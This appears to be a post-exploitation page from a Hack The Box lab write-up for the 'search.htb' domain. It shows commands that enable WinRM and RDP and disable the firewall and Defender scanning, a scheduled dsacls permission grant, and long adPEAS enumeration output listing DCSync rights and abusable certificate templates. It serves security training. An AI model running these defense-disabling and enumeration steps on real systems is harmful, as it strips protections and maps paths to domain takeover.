Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target domain.
ps c:\> Enable-PSRemoting -Force
WinRM is already set up to receive requests on this computer.
WinRM has been updated for remote management.
WinRM firewall exception enabled.
ps c:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
ps c:\> netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.WinRM & RDP enabled
*evil-winrm* ps c:\Users\Tristan.Davies> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
*evil-winrm* ps c:\Users\Tristan.Davies> Set-MpPreference -DisableRealtimeMonitoring $true
*evil-winrm* ps c:\Users\Tristan.Davies> Set-MpPreference -DisableIOAVProtection $true
*evil-winrm* ps c:\Users\Tristan.Davies> Set-MpPreference -DisableScriptScanning 1AV & FW disabled
Scheduled Tasks
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
TaskName TaskPath State
-------- -------- -----
Perms \ Ready
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> cmd /c schtasks /QUERY /TN \Perms /V /FO LIST
Folder: \
HostName: RESEARCH
TaskName: \Perms
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 31/01/2024 14:13:04
Last Result: 0
Author: SEARCH\Administrator
Task To Run: C:\Windows\Tasks\perms.bat
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AC:\Windows\Tasks\perms.bat
*evil-winrm* ps c:\Users\Tristan.Davies\Documents> cat C:\Windows\Tasks\perms.bat
dsacls "cn=tristan davies,cn=users,dc=search,dc=htb" /g "s-1-5-21-271492789-1610487937-1871574529-1299:GAInstalled Programs
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/14/2020 11:24 AM HelpDesk
d----- 3/23/2020 7:20 AM inetpub
d----- 7/30/2020 3:43 PM PerfLogs
d-r--- 4/13/2022 12:21 PM Program Files
d----- 9/15/2018 8:21 AM Program Files (x86)
d----- 1/30/2024 5:31 PM RedirectedFolders
d-r--- 1/31/2024 10:46 AM Users
d----- 1/31/2024 10:26 AM Windows
-a---- 1/31/2024 10:25 AM 90 __1706696618.39789
-a---- 1/31/2024 10:26 AM 21 __output
*Evil-WinRM* PS C:\> ls "Program Files"
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/26/2020 10:24 AM common files
d----- 9/15/2018 8:12 AM internet explorer
d----- 7/31/2020 9:06 AM PackageManagement
d----- 4/13/2022 12:21 PM VMware
d----- 5/24/2021 9:42 AM Windows Defender
d----- 11/22/2021 8:17 PM Windows Defender Advanced Threat Protection
d----- 7/31/2020 9:06 AM WindowsPowerShell
*Evil-WinRM* PS C:\> ls "Program Files (x86)"
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2018 8:21 AM common files
d----- 9/15/2018 8:12 AM internet explorer
d----- 9/15/2018 8:12 AM Microsoft.NET
d----- 5/24/2021 9:42 AM Windows Defender
d----- 9/15/2018 8:12 AM WindowsPowerShell
*Evil-WinRM* PS C:\> ls "ProgramData"
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/13/2023 2:59 PM Corefig
d---s- 1/31/2024 10:48 AM Microsoft
d----- 4/13/2022 12:20 PM Package Cache
d----- 1/30/2024 9:07 AM regid.1991-06.com.microsoft
d----- 9/15/2018 8:12 AM SoftwareDistribution
d----- 3/23/2020 1:31 PM ssh
d----- 3/22/2020 11:51 PM USOPrivate
d----- 3/22/2020 11:51 PM USOShared
d----- 12/16/2021 5:08 PM VMwareWeb
*evil-winrm* ps c:\inetpub> ls
directory: C:\inetpub
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2020 7:20 AM custerr
d----- 8/11/2020 9:45 AM history
d----- 4/7/2020 10:05 AM logs
d----- 4/7/2020 8:26 AM temp
d----- 4/9/2020 8:56 AM wwwroot
*evil-winrm* ps c:\inetpub> cd wwwroot
*evil-winrm* ps c:\inetpub\wwwroot> ls
directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/9/2020 8:55 AM css
d----- 4/9/2020 8:55 AM fonts
d----- 4/9/2020 8:55 AM images
d----- 4/9/2020 8:55 AM js
d----- 4/9/2020 8:55 AM scss
-a---- 8/11/2020 11:13 AM 44982 index.html
-a---- 9/24/2019 11:22 AM 931 main.html
-a---- 12/27/2019 8:20 AM 16521 prepros-6.config
-a---- 4/9/2020 8:55 AM 19559 single.htmlStatic
adPEAS
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> . .\adPEAS.ps1
*Evil-WinRM* PS C:\Users\Tristan.Davies\Documents> Invoke-adPEAS
_ _____ ______ _____
| | __ \| ____| /\ / ____|
____ __| | |__) | |__ / \ | (___
/ _ |/ _ | ___/| __| / /\ \ \___ \
| (_| | (_| | | | |____ / ____ \ ____) |
\__,_|\__,_|_| |______/_/ \_\_____/
Version 0.8.13
Active Directory Enumeration
by @61106960
Legend
[?] Searching for juicy information
[!] Found a vulnerability which may can be exploited in some way
[+] Found some interesting information for further investigation
[*] Some kind of note
[#] Reserved
[?] +++++ Searching for Juicy Active Directory Information +++++
[?] +++++ Checking General Domain Information +++++
[+] Found general Active Directory domain information for domain 'search.htb':
Domain Name: search.htb
Domain SID: S-1-5-21-271492789-1610487937-1871574529
Domain Functional Level: Windows 2016
Forest Name: search.htb
Forest Children: No Subdomain[s] available
Domain Controller: Research.search.htb
[?] +++++ Checking Domain Policies +++++
[+] Found password policy of domain 'search.htb':
Minimum Password Age: 1 days
[!] Maximum Password Age: Disabled
[+] Minimum Password Length: 7 character
[!] Password Complexity: Disabled
[!] Lockout Account: Disabled
Reversible Encryption: Disabled
[+] Found Kerberos policy of domain 'search.htb':
Maximum Age of TGT: 10 hours
Maximum Age of TGS: 600 minutes
Maximum Clock Time Difference: 5 minutes
Krbtgt Password Last Set: 03/31/2020 15:19:36
[?] +++++ Checking Domain Controller, Sites and Subnets +++++
[+] Found domain controller of domain 'search.htb':
DC Host Name: Research.search.htb
DC Roles: SchemaRole,NamingRole,PdcRole,RidRole,InfrastructureRole
DC IP Address: fe80::a950:56b9:6c45:e1ce%6
Site Name: Default-First-Site-Name
[+] Found configured sites and IP subnets of domain 'search.htb':
Site IP Subnet: 172.22.20.0/23 (Site: Birmingham)
Site IP Subnet: 172.22.22.0/23 (Site: Glasgow)
Site IP Subnet: 172.22.24.0/23 (Site: London)
Site IP Subnet: 172.22.26.0/23 (Site: Manchester)
Site IP Subnet: 172.22.28.0/23 (Site: Newcastle)
Site IP Subnet: 172.22.30.0/23 (Site: Sheffield)
[?] +++++ Checking Forest and Domain Trusts +++++
[?] +++++ Checking Juicy Permissions +++++
[?] +++++ Checking Add-Computer Permissions +++++
[+] Filtering found identities that can add a computer object to domain '':
sAMAccountName: Domain Admins
distinguishedName: CN=Domain Admins,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-512
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Designated administrators of the domain
[+] admincount: This identity is or was member of a high privileged admin group
[+] The identity 'HelpDesk' is a non-default account and can add computer to the domain
sAMAccountName: HelpDesk
distinguishedName: CN=HelpDesk,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1294
[?] +++++ Checking DCSync Permissions +++++
[+] Filtering found identities that can perform DCSync in domain '':
[+] The identity 'Tristan.Davies' is a non-default account and can DCSync a domain controller
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[?] +++++ Checking LAPS Permissions +++++
[?] +++++ Searching for GPO local group membership Information +++++
[+] Found GPO 'Default Domain Policy' which adds member[s] to local group'Remote Desktop Users (built-in)'
GPO Name: Default Domain Policy
Local GroupName: Remote Desktop Users (built-in)
Local GroupSID: S-1-5-32-555
GroupMembers: SEARCH\Domain Users
[?] +++++ Searching for Active Directory Certificate Services Information +++++
[+] Found at least one available Active Directory Certificate Service
adPEAS does basic enumeration only, consider reading https://posts.specterops.io/certified-pre-owned-d95910965cd2
[+] Found Active Directory Certificate Services 'search-RESEARCH-CA':
CA Name: search-RESEARCH-CA
CA dnshostname: Research.search.htb
CA IP Address: 10.10.11.129
Date of Creation: 04/07/2020 07:29:30
DistinguishedName: CN=search-RESEARCH-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
NTAuthCertificates: True
Available Templates: ITSecOps
WebServers
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
[?] +++++ Searching for Vulnerable Certificate Templates +++++
adPEAS does basic enumeration only, consider using https://github.com/GhostPack/Certify or https://github.com/ly4k/Certipy
[?] +++++ Checking Template 'ITSecOps' +++++
[+] Identity 'SEARCH\ITSec' has enrollment rights for template 'ITSecOps'
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'ITSecOps'
Template Name: ITSecOps
Template distinguishedname: CN=ITSecOps,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 12:45:26
[+] Extended Key Usage: Client Authentication
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for: SEARCH\ITSec
SEARCH\Domain Users
[?] +++++ Checking Template 'WebServers' +++++
[!] Template 'WebServers' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: WebServers
Template distinguishedname: CN=WebServers,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 10:07:27
Extended Key Usage: Server Authentication
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[?] +++++ Checking Template 'DirectoryEmailReplication' +++++
[?] +++++ Checking Template 'DomainControllerAuthentication' +++++
[?] +++++ Checking Template 'KerberosAuthentication' +++++
[?] +++++ Checking Template 'EFSRecovery' +++++
[?] +++++ Checking Template 'EFS' +++++
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'EFS'
Template Name: EFS
Template distinguishedname: CN=EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
Extended Key Usage: Encrypting File System
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for: SEARCH\Domain Users
[?] +++++ Checking Template 'DomainController' +++++
[?] +++++ Checking Template 'WebServer' +++++
[!] Template 'WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: WebServer
Template distinguishedname: CN=WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
Extended Key Usage: Server Authentication
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[?] +++++ Checking Template 'Machine' +++++
[+] Identity 'SEARCH\Domain Computers' has enrollment rights for template 'Machine'
Template Name: Machine
Template distinguishedname: CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
[+] Extended Key Usage: Client Authentication, Server Authentication
EnrollmentFlag: AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[+] Enrollment allowed for: SEARCH\Domain Computers
[?] +++++ Checking Template 'User' +++++
[+] Identity 'SEARCH\Domain Users' has enrollment rights for template 'User'
Template Name: User
Template distinguishedname: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
[+] Extended Key Usage: Encrypting File System, Secure E-mail, Client Authentication
EnrollmentFlag: INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag: SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for: SEARCH\Domain Users
[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name: SubCA
Template distinguishedname: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=search,DC=htb
Date of Creation: 04/07/2020 07:29:30
EnrollmentFlag: 0
[!] CertificateNameFlag: ENROLLEE_SUPPLIES_SUBJECT
[?] +++++ Checking Template 'Administrator' +++++
[?] +++++ Searching for Credentials Exposure +++++
[?] +++++ Searching for ASREProastable User +++++
[?] +++++ Searching for Kerberoastable User +++++
Warning: [Get-DomainSPNTicket] Error requesting ticket for SPN 'RESEARCH/web_svc.search.htb:60001' from user 'CN=Web Service,OU=Users,OU=Sheffield,OU=Sites,DC=search,DC=htb' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details."
[?] +++++ Searching for User with 'Linux/Unix Password' attribute +++++
[?] +++++ Searching for Computer with enabled and readable LAPS attribute +++++
[?] +++++ Searching for Group Managed Service Account (gMSA) +++++
[+] Found group Managed Service Account 'BIR-ADFS-GMSA$':
sAMAccountName: BIR-ADFS-GMSA$
distinguishedName: CN=BIR-ADFS-GMSA,CN=Managed Service Accounts,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1299
[+] description: ADFS on Covid
[+] AllowedToRetrieveManagedPassword: Sheffield-ITSec
Rene.Larson
Glasgow-ITSec
Abby.Gonzalez
Manchester-ITSec
Camren.Luna
Birmingham-ITSec
Sierra.Frye
London-ITSec
Keely.Lyons
pwdLastSet: 04/09/2020 10:05:04
lastLogonTimestamp: 01/31/2024 01:10:28
userAccountControl: WORKSTATION_TRUST_ACCOUNT
[?] +++++ Searching for Credentials in SYSVOL Group Policy Files +++++
[?] +++++ Searching for Sensitive Information in NETLOGON Share +++++
[?] +++++ Searching for Delegation Issues +++++
[?] +++++ Searching for Computer with Unconstrained Delegation Rights +++++
[?] +++++ Searching for Computer with Constrained Delegation Rights +++++
[?] +++++ Searching for Computer with Resource-Based Constrained Delegation Rights +++++
[?] +++++ Searching for User with Constrained Delegation Rights +++++
[?] +++++ Searching for User with Resource-Based Constrained Delegation Rights +++++
[?] +++++ Starting Account Enumeration +++++
[?] +++++ Searching for Azure AD Connect +++++
[?] +++++ Searching for Users in High Privileged Groups +++++
[+] Found members in group 'BUILTIN\Administrators':
GroupName: Enterprise Admins
distinguishedName: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-519
[+] description: Designated administrators of the enterprise
GroupName: Domain Admins
distinguishedName: CN=Domain Admins,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-512
[+] description: Designated administrators of the domain
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Built-in account for administering the computer/domain
pwdLastSet: 04/14/2020 14:38:29
lastLogonTimestamp: 01/30/2024 09:08:40
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SEARCH\Domain Admins':
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Built-in account for administering the computer/domain
pwdLastSet: 04/14/2020 14:38:29
lastLogonTimestamp: 01/30/2024 09:08:40
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SEARCH\Enterprise Admins':
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Built-in account for administering the computer/domain
pwdLastSet: 04/14/2020 14:38:29
lastLogonTimestamp: 01/30/2024 09:08:40
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'SEARCH\Group Policy Creator Owners':
sAMAccountName: Tristan.Davies
userPrincipalName: Tristan.Davies@search.htb
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1298
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: The only Domain Admin allowed, Administrator will soon be disabled
pwdLastSet: 01/31/2024 10:08:55
lastLogonTimestamp: 01/31/2024 10:12:00
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
sAMAccountName: Administrator
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-500
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
CN=Domain Admins,CN=Users,DC=search,DC=htb
CN=Enterprise Admins,CN=Users,DC=search,DC=htb
CN=Schema Admins,CN=Users,DC=search,DC=htb
CN=Administrators,CN=Builtin,DC=search,DC=htb
[+] description: Built-in account for administering the computer/domain
pwdLastSet: 04/14/2020 14:38:29
lastLogonTimestamp: 01/30/2024 09:08:40
userAccountControl: NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
[+] admincount: This identity is or was member of a high privileged admin group
[+] Found members in group 'BUILTIN\Access Control Assistance Operators':
GroupName: London-ITSec
distinguishedName: CN=London-ITSec,OU=Groups,OU=London,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1105
GroupName: Manchester-ITSec
distinguishedName: CN=Manchester-ITSec,OU=Groups,OU=Manchester,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1107
GroupName: Sheffield-ITSec
distinguishedName: CN=Sheffield-ITSec,OU=Groups,OU=Sheffield,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1110
GroupName: Birmingham-ITSec
distinguishedName: CN=Birmingham-ITSec,OU=Groups,OU=Birmingham,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1106
GroupName: Glasgow-ITSec
distinguishedName: CN=Glasgow-ITSec,OU=Glasgow,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1108
GroupName: ITSec
distinguishedName: CN=ITSec,OU=Sites,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1295
[+] Found members in group 'SEARCH\Cert Publishers':
sAMAccountName: RESEARCH$
distinguishedName: CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem: Windows Server 2019 Standard
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet: 01/30/2024 09:08:03
lastLogonTimestamp: 01/30/2024 09:08:33
[+] userAccountControl: SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
[?] +++++ Searching for High Privileged Users with a password older 5 years +++++
[?] +++++ Searching for High Privileged User which may not require a Password +++++
[?] +++++ Starting Computer Enumeration +++++
[?] +++++ Searching for Domain Controllers +++++
[+] Found Domain Controller 'RESEARCH$':
sAMAccountName: RESEARCH$
distinguishedName: CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem: Windows Server 2019 Standard
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet: 01/30/2024 09:08:03
lastLogonTimestamp: 01/30/2024 09:08:33
[+] userAccountControl: SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
[?] +++++ Searching for Exchange Servers +++++
[?] +++++ Searching for ADCS Servers +++++
[+] Found ADCS Server 'RESEARCH$':
sAMAccountName: RESEARCH$
distinguishedName: CN=RESEARCH,OU=Domain Controllers,DC=search,DC=htb
objectSid: S-1-5-21-271492789-1610487937-1871574529-1001
operatingsystem: Windows Server 2019 Standard
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=search,DC=htb
CN=Cert Publishers,CN=Users,DC=search,DC=htb
pwdLastSet: 01/30/2024 09:08:03
lastLogonTimestamp: 01/30/2024 09:08:33
[+] userAccountControl: SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION